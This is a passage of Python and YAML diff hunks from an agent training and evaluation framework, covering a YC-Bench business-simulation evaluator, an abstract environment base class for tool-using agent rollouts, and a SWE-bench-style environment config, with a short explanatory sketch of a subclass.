"you can take\n\n"
"Then accept 2-3 tasks, assign employees, dispatch them, and call "
"`yc-bench sim resume` to advance time. Repeat this loop until the "
"simulation ends (horizon reached or bankruptcy)."
)
async def compute_reward(self, item, result, ctx) -> float:
return 0.0
async def collect_trajectories(self, item):
return None, []
async def score(self, rollout_group_data):
return None
# =========================================================================
# Per-run evaluation
# =========================================================================
async def rollout_and_score_eval(self, eval_item: Dict[str, Any]) -> Dict:
"""
Evaluate a single (preset, seed) run.
1. Sets DATABASE_URL and YC_BENCH_EXPERIMENT env vars
2. Initialises the simulation via ``yc-bench sim init`` (NOT ``run``)
3. Runs HermesAgentLoop with terminal tool
4. Reads SQLite DB to compute final score
5. Returns result dict with survival, funds, and composite score
"""
preset = eval_item["preset"]
seed = eval_item["seed"]
run_id = str(uuid.uuid4())[:8]
run_key = f"{preset}_seed{seed}_{run_id}"
from tqdm import tqdm
tqdm.write(f" [START] preset={preset!r} seed={seed} (run_id={run_id})")
run_start = time.time()
# Isolated DB per run -- prevents cross-run state leakage
db_path = os.path.join(self.config.db_dir, f"yc_bench_{run_key}.db")
os.environ["DATABASE_URL"] = f"sqlite:///{db_path}"
os.environ["YC_BENCH_EXPERIMENT"] = preset
# Determine horizon: explicit config override > preset lookup > default 1
horizon = self.config.horizon_years or _PRESET_HORIZONS.get(preset, 1)
try:
# ----------------------------------------------------------
# Step 1: Initialise the simulation via CLI
# IMPORTANT: We use `sim init`, NOT `yc-bench run`.
# `yc-bench run` starts yc-bench's own LLM agent loop (via
# LiteLLM), which would compete with our HermesAgentLoop.
# `sim init` just sets up the world and returns.
# ----------------------------------------------------------
init_cmd = [
"yc-bench", "sim", "init",
"--seed", str(seed),
"--start-date", self.config.start_date,
"--company-name", self.config.company_name,
"--horizon-years", str(horizon),
]
init_result = subprocess.run(
init_cmd, capture_output=True, text=True, timeout=30,
)
if init_result.returncode != 0:
error_msg = (init_result.stderr or init_result.stdout).strip()
raise RuntimeError(f"yc-bench sim init failed: {error_msg}")
tqdm.write(f" Simulation initialized (horizon={horizon}yr)")
# ----------------------------------------------------------
# Step 2: Run the HermesAgentLoop
# ----------------------------------------------------------
tools, valid_names = self._resolve_tools_for_group()
messages: List[Dict[str, Any]] = [
{"role": "system", "content": YC_BENCH_SYSTEM_PROMPT},
{"role": "user", "content": self.format_prompt(eval_item)},
]
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=run_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
# ----------------------------------------------------------
# Step 3: Read final score from the simulation DB
# ----------------------------------------------------------
score_data = _read_final_score(db_path)
final_funds = score_data["final_funds_cents"]
survived = score_data["survived"]
terminal_reason = score_data["terminal_reason"]
composite = _compute_composite_score(
final_funds_cents=final_funds,
survived=survived,
survival_weight=self.config.survival_weight,
funds_weight=self.config.funds_weight,
)
elapsed = time.time() - run_start
status = "SURVIVED" if survived else "BANKRUPT"
if final_funds >= 0:
funds_str = f"${final_funds / 100:,.0f}"
else:
funds_str = f"-${abs(final_funds) / 100:,.0f}"
tqdm.write(
f" [{status}] preset={preset!r} seed={seed} "
f"funds={funds_str} score={composite:.3f} "
f"turns={result.turns_used} ({elapsed:.0f}s)"
)
out = {
"preset": preset,
"seed": seed,
"survived": survived,
"final_funds_cents": final_funds,
"final_funds_usd": final_funds / 100,
"terminal_reason": terminal_reason,
"composite_score": composite,
"turns_used": result.turns_used,
"finished_naturally": result.finished_naturally,
"elapsed_seconds": elapsed,
"db_path": db_path,
"messages": result.messages,
}
self._save_result(out)
return out
except Exception as e:
elapsed = time.time() - run_start
logger.error("Run %s failed: %s", run_key, e, exc_info=True)
tqdm.write(
f" [ERROR] preset={preset!r} seed={seed}: {e} ({elapsed:.0f}s)"
)
out = {
"preset": preset,
"seed": seed,
"survived": False,
"final_funds_cents": 0,
"final_funds_usd": 0.0,
"terminal_reason": f"error: {e}",
"composite_score": 0.0,
"turns_used": 0,
"error": str(e),
"elapsed_seconds": elapsed,
}
self._save_result(out)
return out
# =========================================================================
# Evaluate
# =========================================================================
async def _run_with_timeout(self, item: Dict[str, Any]) -> Dict:
"""Wrap a single rollout with a wall-clock timeout."""
preset = item["preset"]
seed = item["seed"]
try:
return await asyncio.wait_for(
self.rollout_and_score_eval(item),
timeout=self.config.run_timeout,
)
except asyncio.TimeoutError:
from tqdm import tqdm
tqdm.write(
f" [TIMEOUT] preset={preset!r} seed={seed} "
f"(exceeded {self.config.run_timeout}s)"
)
out = {
"preset": preset,
"seed": seed,
"survived": False,
"final_funds_cents": 0,
"final_funds_usd": 0.0,
"terminal_reason": f"timeout ({self.config.run_timeout}s)",
"composite_score": 0.0,
"turns_used": 0,
"error": "timeout",
}
self._save_result(out)
return out
async def evaluate(self, *args, **kwargs) -> None:
"""
Run YC-Bench evaluation over all (preset, seed) combinations.
Runs sequentially -- each run is 100-500 turns, and each run sets
process-global env vars (DATABASE_URL, YC_BENCH_EXPERIMENT), so
parallel runs would clobber each other's state.
"""
start_time = time.time()
from tqdm import tqdm
# --- tqdm-compatible logging handler (TB2 pattern) ---
class _TqdmHandler(logging.Handler):
def emit(self, record):
try:
tqdm.write(self.format(record))
except Exception:
self.handleError(record)
root = logging.getLogger()
handler = _TqdmHandler()
handler.setFormatter(
logging.Formatter("%(levelname)s %(name)s: %(message)s")
)
root.handlers = [handler]
for noisy in ("httpx", "openai"):
logging.getLogger(noisy).setLevel(logging.WARNING)
# --- Print config summary ---
print(f"\n{'='*60}")
print("Starting YC-Bench Evaluation")
print(f"{'='*60}")
print(f" Presets: {self.config.presets}")
print(f" Seeds: {self.config.seeds}")
print(f" Total runs: {len(self.all_eval_items)}")
print(f" Max turns/run: {self.config.max_agent_turns}")
print(f" Run timeout: {self.config.run_timeout}s")
print(f"{'='*60}\n")
results = []
pbar = tqdm(
total=len(self.all_eval_items), desc="YC-Bench", dynamic_ncols=True
)
try:
for item in self.all_eval_items:
result = await self._run_with_timeout(item)
results.append(result)
survived_count = sum(1 for r in results if r.get("survived"))
pbar.set_postfix_str(
f"survived={survived_count}/{len(results)}"
)
pbar.update(1)
except (KeyboardInterrupt, asyncio.CancelledError):
tqdm.write("\n[INTERRUPTED] Stopping evaluation...")
pbar.close()
try:
from tools.terminal_tool import cleanup_all_environments
cleanup_all_environments()
except Exception:
pass
if hasattr(self, "_streaming_file") and not self._streaming_file.closed:
self._streaming_file.close()
return
pbar.close()
end_time = time.time()
# --- Compute metrics ---
valid = [r for r in results if r is not None]
if not valid:
print("Warning: No valid results.")
return
total = len(valid)
survived_total = sum(1 for r in valid if r.get("survived"))
survival_rate = survived_total / total if total else 0.0
avg_score = (
sum(r.get("composite_score", 0) for r in valid) / total
if total
else 0.0
)
preset_results: Dict[str, List[Dict]] = defaultdict(list)
for r in valid:
preset_results[r["preset"]].append(r)
eval_metrics = {
"eval/survival_rate": survival_rate,
"eval/avg_composite_score": avg_score,
"eval/total_runs": total,
"eval/survived_runs": survived_total,
"eval/evaluation_time_seconds": end_time - start_time,
}
for preset, items in sorted(preset_results.items()):
ps = sum(1 for r in items if r.get("survived"))
pt = len(items)
pa = (
sum(r.get("composite_score", 0) for r in items) / pt
if pt
else 0
)
key = preset.replace("-", "_")
eval_metrics[f"eval/survival_rate_{key}"] = ps / pt if pt else 0
eval_metrics[f"eval/avg_score_{key}"] = pa
self.eval_metrics = [(k, v) for k, v in eval_metrics.items()]
# --- Print summary ---
print(f"\n{'='*60}")
print("YC-Bench Evaluation Results")
print(f"{'='*60}")
print(
f"Overall survival rate: {survival_rate:.1%} "
f"({survived_total}/{total})"
)
print(f"Average composite score: {avg_score:.4f}")
print(f"Evaluation time: {end_time - start_time:.1f}s")
print("\nPer-preset breakdown:")
for preset, items in sorted(preset_results.items()):
ps = sum(1 for r in items if r.get("survived"))
pt = len(items)
pa = (
sum(r.get("composite_score", 0) for r in items) / pt
if pt
else 0
)
print(f" {preset}: {ps}/{pt} survived avg_score={pa:.4f}")
for r in items:
status = "SURVIVED" if r.get("survived") else "BANKRUPT"
funds = r.get("final_funds_usd", 0)
print(
f" seed={r['seed']} [{status}] "
f"${funds:,.0f} "
f"score={r.get('composite_score', 0):.3f}"
)
print(f"{'='*60}\n")
# --- Log results ---
samples = [
{k: v for k, v in r.items() if k != "messages"} for r in valid
]
try:
await self.evaluate_log(
metrics=eval_metrics,
samples=samples,
start_time=start_time,
end_time=end_time,
generation_parameters={
"temperature": self.config.agent_temperature,
"max_tokens": self.config.max_token_length,
"max_agent_turns": self.config.max_agent_turns,
},
)
except Exception as e:
print(f"Error logging results: {e}")
# --- Cleanup (TB2 pattern) ---
if hasattr(self, "_streaming_file") and not self._streaming_file.closed:
self._streaming_file.close()
print(f"Results saved to: {self._streaming_path}")
try:
from tools.terminal_tool import cleanup_all_environments
cleanup_all_environments()
except Exception:
pass
try:
from environments.agent_loop import _tool_executor
_tool_executor.shutdown(wait=False, cancel_futures=True)
except Exception:
pass
# =========================================================================
# Wandb logging
# =========================================================================
async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
"""Log YC-Bench-specific metrics to wandb."""
if wandb_metrics is None:
wandb_metrics = {}
for k, v in self.eval_metrics:
wandb_metrics[k] = v
self.eval_metrics = []
await super().wandb_log(wandb_metrics)
if __name__ == "__main__":
YCBenchEvalEnv.cli()


@@ -0,0 +1,670 @@
"""
HermesAgentBaseEnv -- Abstract Base Environment for Hermes-Agent + Atropos
Provides the Atropos integration plumbing that all hermes-agent environments share:
- Two-mode operation (OpenAI server for Phase 1, VLLM ManagedServer for Phase 2)
- Per-group toolset/distribution resolution
- Agent loop orchestration via HermesAgentLoop
- ToolContext creation for reward functions
- ScoredDataGroup construction from ManagedServer state
Subclasses only need to implement:
setup() -- Load dataset, initialize state
get_next_item() -- Return the next item from the dataset
format_prompt() -- Convert a dataset item into the user message
compute_reward() -- Score the rollout (has full ToolContext access)
evaluate() -- Periodic evaluation
"""
import asyncio
import json
import logging
import os
import sys
import uuid
from abc import abstractmethod
from pathlib import Path
from typing import Any, Dict, List, Optional, Set, Tuple, Union
# Ensure the hermes-agent repo root is on sys.path so that imports like
# `from model_tools import ...` and `from environments.X import ...` work
# regardless of where the script is invoked from.
_repo_root = Path(__file__).resolve().parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from dotenv import load_dotenv
from pydantic import Field
# Load API keys from hermes-agent/.env so all environments can access them
_env_path = _repo_root / ".env"
if _env_path.exists():
load_dotenv(dotenv_path=_env_path)
# Apply monkey patches for async-safe tool operation inside Atropos's event loop.
# This patches SwerexModalEnvironment to use a background thread instead of
# asyncio.run(), which would deadlock inside Atropos. Safe for normal CLI too.
from environments.patches import apply_patches
apply_patches()
from atroposlib.envs.base import (
BaseEnv,
BaseEnvConfig,
ScoredDataGroup,
ScoredDataItem,
)
from atroposlib.envs.server_handling.server_manager import (
APIServerConfig,
ServerBaseline,
ServerManager,
)
from atroposlib.type_definitions import Item
from environments.agent_loop import AgentResult, HermesAgentLoop
from environments.tool_context import ToolContext
# Import hermes-agent toolset infrastructure
from model_tools import get_tool_definitions
from toolset_distributions import sample_toolsets_from_distribution
logger = logging.getLogger(__name__)
class HermesAgentEnvConfig(BaseEnvConfig):
"""
Configuration for hermes-agent Atropos environments.
Extends BaseEnvConfig with agent-specific settings for toolsets,
terminal backend, dataset loading, and tool call parsing.
"""
# --- Toolset configuration ---
# Mutually exclusive: use either enabled_toolsets OR distribution
enabled_toolsets: Optional[List[str]] = Field(
default=None,
description="Explicit list of hermes toolsets to enable (e.g., ['terminal', 'file', 'web']). "
"If None and distribution is also None, all available toolsets are enabled.",
)
disabled_toolsets: Optional[List[str]] = Field(
default=None,
description="Toolsets to disable. Applied as a filter on top of enabled_toolsets or distribution.",
)
distribution: Optional[str] = Field(
default=None,
description="Name of a toolset distribution from toolset_distributions.py "
"(e.g., 'development', 'terminal_tasks'). Sampled once per group. "
"Mutually exclusive with enabled_toolsets.",
)
# --- Agent loop configuration ---
max_agent_turns: int = Field(
default=30,
description="Maximum number of LLM calls (tool-calling iterations) per rollout.",
)
system_prompt: Optional[str] = Field(
default=None,
description="System prompt for the agent. Tools are handled via the tools= parameter, "
"not embedded in the prompt text.",
)
agent_temperature: float = Field(
default=1.0,
description="Sampling temperature for agent generation during rollouts.",
)
# --- Terminal backend ---
terminal_backend: str = Field(
default="local",
description="Terminal backend: 'local', 'docker', 'modal', 'daytona', 'ssh', 'singularity'. "
"Modal or Daytona recommended for production RL (cloud isolation per rollout).",
)
terminal_timeout: int = Field(
default=120,
description="Per-command timeout in seconds for terminal tool calls. "
"Commands exceeding this are killed. Increase for tasks with long-running "
"commands (compilation, pip install, etc.).",
)
terminal_lifetime: int = Field(
default=3600,
description="Sandbox inactivity lifetime in seconds. The cleanup thread kills "
"sandboxes that have been idle longer than this. Must be longer than "
"the longest gap between tool calls (e.g., waiting for LLM response).",
)
# --- Dataset ---
dataset_name: Optional[str] = Field(
default=None,
description="HuggingFace dataset name. Optional if tasks are defined inline.",
)
dataset_split: str = Field(
default="train",
description="Dataset split to use.",
)
prompt_field: str = Field(
default="prompt",
description="Which field in the dataset contains the prompt.",
)
# --- Thread pool ---
tool_pool_size: int = Field(
default=128,
description="Thread pool size for tool execution. Each concurrent task needs a "
"thread for tool calls. Must be large enough for parallel evaluation. "
"Too small = thread pool starvation.",
)
# --- Phase 2: Tool call parsing ---
tool_call_parser: str = Field(
default="hermes",
description="Tool call parser name for Phase 2 (VLLM server type). "
"Ignored in Phase 1 (OpenAI server type where VLLM parses natively). "
"Options: hermes, mistral, llama3_json, qwen, deepseek_v3, etc.",
)
# --- Provider-specific parameters ---
# Passed as extra_body to the OpenAI client's chat.completions.create() call.
# Useful for OpenRouter provider preferences, transforms, route settings, etc.
# Example YAML:
# extra_body:
# provider:
# ignore: ["DeepInfra", "Fireworks"]
# order: ["Together"]
# transforms: ["middle-out"]
extra_body: Optional[Dict[str, Any]] = Field(
default=None,
description="Extra body parameters passed to the OpenAI client's "
"chat.completions.create(). Used for OpenRouter provider preferences, "
"transforms, and other provider-specific settings.",
)
class HermesAgentBaseEnv(BaseEnv):
"""
Abstract base environment for hermes-agent Atropos integration.
Handles two modes of operation:
- Phase 1 (OpenAI server type): Uses server.chat_completion() directly.
The server (VLLM, SGLang, OpenRouter, OpenAI) handles tool call parsing
and reasoning extraction natively. DummyManagedServer provides placeholder
tokens. Good for SFT data gen, verifier testing, evaluation.
- Phase 2 (VLLM server type): Uses ManagedServer for exact token IDs + logprobs
via /generate. Client-side tool call parser reconstructs structured tool_calls
from raw output. Full RL training capability.
Subclasses must implement:
setup() -- Load dataset, initialize state
get_next_item() -- Return the next item to roll out
format_prompt() -- Convert a dataset item into the user message string
compute_reward() -- Score the rollout using ToolContext
evaluate() -- Periodic evaluation
"""
name: Optional[str] = "hermes-agent"
env_config_cls = HermesAgentEnvConfig
def __init__(
self,
config: HermesAgentEnvConfig,
server_configs: Union[ServerBaseline, List[APIServerConfig]],
slurm=False,
testing=False,
):
super().__init__(config, server_configs, slurm, testing)
# Set terminal environment variables so hermes tools pick them up.
# These can all be overridden per-environment via config fields instead
# of requiring users to set shell env vars.
if config.terminal_backend:
os.environ["TERMINAL_ENV"] = config.terminal_backend
os.environ["TERMINAL_TIMEOUT"] = str(config.terminal_timeout)
os.environ["TERMINAL_LIFETIME_SECONDS"] = str(config.terminal_lifetime)
print(
f"🖥️ Terminal: backend={config.terminal_backend}, "
f"timeout={config.terminal_timeout}s, lifetime={config.terminal_lifetime}s"
)
# Resize the agent loop's thread pool for tool execution.
# This must be large enough for the number of concurrent tasks
# (e.g., 89 parallel TB2 eval tasks each need a thread for tool calls).
from environments.agent_loop import resize_tool_pool
resize_tool_pool(config.tool_pool_size)
# Set tool_parser on the ServerManager so ManagedServer uses it
# for bidirectional tool call translation (raw text ↔ OpenAI tool_calls).
if hasattr(self.server, 'tool_parser'):
self.server.tool_parser = config.tool_call_parser
print(f"🔧 Tool parser: {config.tool_call_parser}")
# Current group's resolved tools (set in collect_trajectories)
self._current_group_tools: Optional[Tuple[List[Dict], Set[str]]] = None
# Tool error tracking for wandb logging
self._tool_error_buffer: List[Dict[str, Any]] = []
# =========================================================================
# Toolset resolution (per-group)
# =========================================================================
def _resolve_tools_for_group(self) -> Tuple[List[Dict[str, Any]], Set[str]]:
"""
Resolve toolsets for a group. Called once in collect_trajectories(),
then shared by all collect_trajectory() calls in the group.
If distribution is set, samples probabilistically.
If enabled_toolsets is set, uses that explicit list.
disabled_toolsets is applied as a filter on top.
Returns:
(tool_schemas, valid_tool_names) tuple
"""
config = self.config
if config.distribution:
group_toolsets = sample_toolsets_from_distribution(config.distribution)
logger.info("Sampled toolsets from '%s': %s", config.distribution, group_toolsets)
else:
group_toolsets = config.enabled_toolsets # None means "all available"
if group_toolsets is None:
logger.warning(
"enabled_toolsets is None -- loading ALL tools including messaging. "
"Set explicit enabled_toolsets for RL training."
)
tools = get_tool_definitions(
enabled_toolsets=group_toolsets,
disabled_toolsets=config.disabled_toolsets,
quiet_mode=True,
)
valid_names = {t["function"]["name"] for t in tools} if tools else set()
logger.info("Resolved %d tools for group: %s", len(valid_names), sorted(valid_names))
return tools, valid_names
# =========================================================================
# Server mode detection
# =========================================================================
def _use_managed_server(self) -> bool:
"""
Determine if we should use ManagedServer (Phase 2) or direct server (Phase 1).
Phase 2 (ManagedServer) is used when the server type is 'vllm' or 'sglang',
which go through the /generate endpoint for exact token tracking.
Phase 1 (direct server) is used for 'openai' server type, which uses
/v1/chat/completions with native tool call parsing.
"""
if not self.server.servers:
return False
server = self.server.servers[0]
# If the server is an OpenAI server (not VLLM/SGLang), use direct mode
from atroposlib.envs.server_handling.openai_server import OpenAIServer
return not isinstance(server, OpenAIServer)
# =========================================================================
# Core Atropos integration
# =========================================================================
async def collect_trajectories(
self, item: Item
) -> Tuple[
Union[Optional[ScoredDataGroup], List[Optional[ScoredDataGroup]]],
List[Item],
]:
"""
Override collect_trajectories to resolve toolsets once per group,
then delegate to the standard group-level collection.
The default BaseEnv.collect_trajectories() calls collect_trajectory()
group_size times in parallel. We resolve tools once here and store
them for all those calls to use.
"""
# Resolve toolsets for this group (shared by all rollouts in the group)
self._current_group_tools = self._resolve_tools_for_group()
# Delegate to the default implementation which calls collect_trajectory()
# group_size times via asyncio.gather
return await super().collect_trajectories(item)
# =========================================================================
# Wandb rollout display -- format trajectories nicely
# =========================================================================
@staticmethod
def _format_trajectory_for_display(messages: List[Dict[str, Any]]) -> str:
"""
Format a conversation's messages into a readable trajectory string
for wandb rollout tables. Shows tool calls, tool results, and reasoning
in a structured way instead of raw token decoding.
"""
parts = []
for msg in messages:
role = msg.get("role", "unknown")
content = msg.get("content", "")
if role == "system":
parts.append(f"[SYSTEM]\n{content}")
elif role == "user":
parts.append(f"[USER]\n{content}")
elif role == "assistant":
# Show reasoning if present
reasoning = msg.get("reasoning_content", "")
if reasoning:
# Truncate long reasoning for display
if len(reasoning) > 300:
reasoning = reasoning[:300] + "..."
parts.append(f"[ASSISTANT thinking]\n{reasoning}")
# Show content
if content:
parts.append(f"[ASSISTANT]\n{content}")
# Show tool calls
tool_calls = msg.get("tool_calls", [])
for tc in tool_calls:
func = tc.get("function", {})
name = func.get("name", "?")
args = func.get("arguments", "{}")
# Truncate long arguments for display
if len(args) > 200:
args = args[:200] + "..."
parts.append(f"[TOOL CALL] {name}({args})")
elif role == "tool":
tool_id = msg.get("tool_call_id", "")
result = content
# Truncate long tool results for display
if len(result) > 500:
result = result[:500] + "..."
parts.append(f"[TOOL RESULT] {result}")
return "\n\n".join(parts)
async def add_rollouts_for_wandb(
self,
scored_data,
item=None,
):
"""
Override to show formatted trajectories with tool calls visible,
instead of raw token decoding which loses all structure.
"""
num_keep = self.config.num_rollouts_per_group_for_logging
if num_keep == -1:
num_keep = self.config.group_size
group = []
for i in range(min(num_keep, len(scored_data.get("scores", [])))):
score = scored_data["scores"][i]
# Use messages if available for rich display
messages = None
if scored_data.get("messages") and i < len(scored_data["messages"]):
messages = scored_data["messages"][i]
if messages:
text = self._format_trajectory_for_display(messages)
elif scored_data.get("tokens") and i < len(scored_data["tokens"]):
text = self.tokenizer.decode(scored_data["tokens"][i])
else:
text = "(no data)"
group.append((text, score))
self.rollouts_for_wandb.append(group)
if len(self.rollouts_for_wandb) > self.config.num_rollouts_to_keep:
self.rollouts_for_wandb.pop(0)
async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
"""Log base metrics including tool errors to wandb."""
if wandb_metrics is None:
wandb_metrics = {}
# Log tool error stats
if self._tool_error_buffer:
wandb_metrics["train/tool_errors_count"] = len(self._tool_error_buffer)
# Log error details as a summary string (tables can crash wandb on tmp cleanup)
error_summaries = []
for err in self._tool_error_buffer:
error_summaries.append(
f"[turn {err['turn']}] {err['tool']}({err['args'][:80]}) -> {err['error'][:150]}"
)
wandb_metrics["train/tool_error_details"] = "\n".join(error_summaries)
# Also print to stdout for immediate visibility
for summary in error_summaries:
print(f" Tool Error: {summary}")
self._tool_error_buffer = []
else:
wandb_metrics["train/tool_errors_count"] = 0
await super().wandb_log(wandb_metrics)
async def collect_trajectory(
self, item: Item
) -> Tuple[Optional[Union[ScoredDataItem, Any]], List[Item]]:
"""
Run a single rollout: agent loop + reward computation.
This is called group_size times in parallel by collect_trajectories().
Each call gets its own task_id for terminal/browser session isolation.
"""
task_id = str(uuid.uuid4())
# Get group-level tools (resolved once in collect_trajectories)
if self._current_group_tools is None:
# Fallback: resolve per-trajectory if called outside collect_trajectories
tools, valid_names = self._resolve_tools_for_group()
else:
tools, valid_names = self._current_group_tools
# Build initial messages
messages: List[Dict[str, Any]] = []
if self.config.system_prompt:
messages.append({"role": "system", "content": self.config.system_prompt})
messages.append({"role": "user", "content": self.format_prompt(item)})
# Run the agent loop
result: AgentResult
if self._use_managed_server():
# Phase 2: ManagedServer with ToolCallTranslator -- exact tokens + logprobs
# tool_parser is set on ServerManager in __init__ and passed through
# to ManagedServer, which uses ToolCallTranslator for bidirectional
# translation between raw text and OpenAI tool_calls.
try:
async with self.server.managed_server(
tokenizer=self.tokenizer,
preserve_think_blocks=bool(self.config.thinking_mode),
) as managed:
agent = HermesAgentLoop(
server=managed,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
except NotImplementedError:
# DummyManagedServer not allowed -- fall back to Phase 1
logger.warning(
"ManagedServer not available (OpenAI server?). "
"Falling back to direct server mode."
)
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
else:
# Phase 1: OpenAI server -- native tool_calls, placeholder tokens
agent = HermesAgentLoop(
server=self.server,
tool_schemas=tools,
valid_tool_names=valid_names,
max_turns=self.config.max_agent_turns,
task_id=task_id,
temperature=self.config.agent_temperature,
max_tokens=self.config.max_token_length,
extra_body=self.config.extra_body,
)
result = await agent.run(messages)
# Skip reward computation if the agent loop produced no meaningful work
# (e.g., API call failed on turn 1). No point spinning up a Modal sandbox
# just to verify files that were never created.
only_system_and_user = all(
msg.get("role") in ("system", "user") for msg in result.messages
)
if result.turns_used == 0 or only_system_and_user:
logger.warning(
"Agent loop produced no output (turns=%d, msgs=%d). Skipping reward.",
result.turns_used, len(result.messages),
)
reward = 0.0
else:
# Compute reward using ToolContext (gives verifier full tool access)
ctx = ToolContext(task_id)
try:
reward = await self.compute_reward(item, result, ctx)
except Exception as e:
logger.error("compute_reward failed: %s", e)
reward = 0.0
finally:
ctx.cleanup()
# Track tool errors for wandb logging
if result.tool_errors:
for err in result.tool_errors:
self._tool_error_buffer.append({
"turn": err.turn,
"tool": err.tool_name,
"args": err.arguments[:150],
"error": err.error[:300],
"result": err.tool_result[:300],
})
# Build ScoredDataItem from ManagedServer state
# Phase 2: real tokens/masks/logprobs from SequenceNodes
# Phase 1: placeholder tokens (still need a valid ScoredDataItem for the pipeline)
nodes = (result.managed_state or {}).get("nodes", [])
if nodes:
# Phase 2 (or DummyManagedServer): use actual node data
node = nodes[-1] # Final sequence node = full trajectory
scored_item: Dict[str, Any] = {
"tokens": node.tokens,
"masks": node.masked_tokens,
"scores": reward,
}
# Include logprobs if available (Phase 2)
if hasattr(node, "logprobs") and node.logprobs:
scored_item["logprobs"] = node.logprobs
scored_item["advantages"] = None  # Computed by trainer
scored_item["ref_logprobs"] = None
else:
# Phase 1 with no managed state: create placeholder tokens
# so the data pipeline doesn't break. These are NOT suitable
# for training but allow process mode (SFT data gen) to work.
# Tokenize the full conversation to get approximate tokens.
full_text = "\n".join(
msg.get("content", "") for msg in result.messages if msg.get("content")
)
if self.tokenizer:
tokens = self.tokenizer.encode(full_text, add_special_tokens=True)
else:
tokens = list(range(min(len(full_text) // 4, 128)))
scored_item = {
"tokens": tokens,
"masks": [-100] + tokens[1:], # Mask first token as prompt
"scores": reward,
}
# Always include messages for wandb rollout display and data logging
scored_item["messages"] = result.messages
return scored_item, []
# =========================================================================
# Abstract methods -- subclasses must implement
# =========================================================================
@abstractmethod
async def setup(self):
"""
Load dataset, initialize state.
Called once when the environment starts. Typical implementation:
self.dataset = load_dataset(self.config.dataset_name, split=self.config.dataset_split)
self.iter = 0
"""
raise NotImplementedError
@abstractmethod
async def get_next_item(self) -> Item:
"""
Return the next item from the dataset for rollout.
Called by the base env's main loop to get items for workers.
Should cycle through the dataset.
"""
raise NotImplementedError
@abstractmethod
def format_prompt(self, item: Item) -> str:
"""
Convert a dataset item into the user message for the agent.
Args:
item: Dataset item (dict, tuple, etc.)
Returns:
The prompt string to send to the agent
"""
raise NotImplementedError
@abstractmethod
async def compute_reward(
self, item: Item, result: AgentResult, ctx: ToolContext
) -> float:
"""
Score the rollout. Has full access to:
- item: the original dataset item (ground truth, test commands, etc.)
- result: AgentResult with full messages, turn count, reasoning, etc.
- ctx: ToolContext -- call ANY hermes-agent tool (terminal, file, web,
browser, vision...) scoped to this rollout's sandbox. Nothing
is off-limits.
Args:
item: The dataset item that was rolled out
result: The agent's rollout result
ctx: ToolContext with full tool access for verification
Returns:
Reward float (typically 0.0 to 1.0, but any float is valid)
"""
raise NotImplementedError
@abstractmethod
async def evaluate(self, *args, **kwargs):
"""
Periodic evaluation. Called every steps_per_eval steps.
Typical implementation runs the agent on a held-out eval set
and logs metrics via wandb/evaluate_log.
"""
raise NotImplementedError
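Taken together, these four methods are the whole subclass contract. As a minimal sketch of how they fit (names and the cat-based check are invented for illustration, and config_init plus the class attributes a runnable env also needs are elided):

class EchoEnv(HermesAgentBaseEnv):
    async def setup(self):
        self.dataset = [
            {"prompt": "Write the word ok to /tmp/ok.txt", "path": "/tmp/ok.txt"}
        ]
        self.iter = 0

    async def get_next_item(self):
        item = self.dataset[self.iter % len(self.dataset)]
        self.iter += 1
        return item

    def format_prompt(self, item):
        return item["prompt"]

    async def compute_reward(self, item, result, ctx):
        # Verify in the same sandbox the model used during its rollout
        check = ctx.terminal(f"cat {item['path']}")
        return 1.0 if check["exit_code"] == 0 else 0.0

    async def evaluate(self, *args, **kwargs):
        pass  # no held-out set in this sketch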


@@ -0,0 +1,34 @@
# SWE Environment -- Default Configuration
#
# SWE-bench style tasks with Modal sandboxes for cloud isolation.
# Uses terminal + file + web toolsets.
#
# Usage:
# python environments/hermes_swe_env/hermes_swe_env.py serve \
# --config environments/hermes_swe_env/default.yaml
env:
enabled_toolsets: ["terminal", "file", "web"]
max_agent_turns: 30
max_token_length: 4096
group_size: 4
terminal_backend: "modal"
tool_call_parser: "hermes"
tokenizer_name: "NousResearch/DeepHermes-3-Llama-3-3B-Preview"
dataset_name: "bigcode/humanevalpack"
dataset_split: "test"
prompt_field: "prompt"
steps_per_eval: 50
total_steps: 500
use_wandb: true
wandb_name: "hermes-swe"
system_prompt: >
You are a skilled software engineer. You have access to a terminal,
file tools, and web search. Use these tools to complete the coding task.
Write clean, working code and verify it runs correctly before finishing.
openai:
base_url: "http://localhost:8000/v1"
model_name: "NousResearch/DeepHermes-3-Llama-3-3B-Preview"
server_type: "openai"
api_key: ""


@@ -0,0 +1,229 @@
"""
HermesSweEnv -- SWE-Bench Style Environment with Modal Sandboxes
A concrete environment for software engineering tasks where the model writes code
and the reward function runs tests to verify correctness. Uses Modal terminal
backend for cloud-isolated sandboxes per rollout.
The reward function uses ToolContext.terminal() to run test commands in the same
Modal sandbox the model used during its agentic loop. All filesystem state from
the model's tool calls is preserved for verification.
Usage:
# Phase 1: OpenAI server type
vllm serve YourModel --tool-parser hermes
run-api
python environments/hermes_swe_env.py serve \\
--openai.base_url http://localhost:8000/v1 \\
--openai.model_name YourModel \\
--openai.server_type openai \\
--env.dataset_name bigcode/humanevalpack \\
--env.terminal_backend modal
# Phase 2: VLLM server type (full RL training)
python environments/hermes_swe_env.py serve \\
--openai.base_url http://localhost:8000/v1 \\
--openai.model_name YourModel \\
--openai.server_type vllm \\
--env.tool_call_parser hermes \\
--env.terminal_backend modal
"""
import logging
import shlex
import sys
import time
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
# Ensure repo root is on sys.path for imports
_repo_root = Path(__file__).resolve().parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from datasets import load_dataset
from atroposlib.envs.base import ScoredDataGroup
from atroposlib.envs.server_handling.server_manager import APIServerConfig
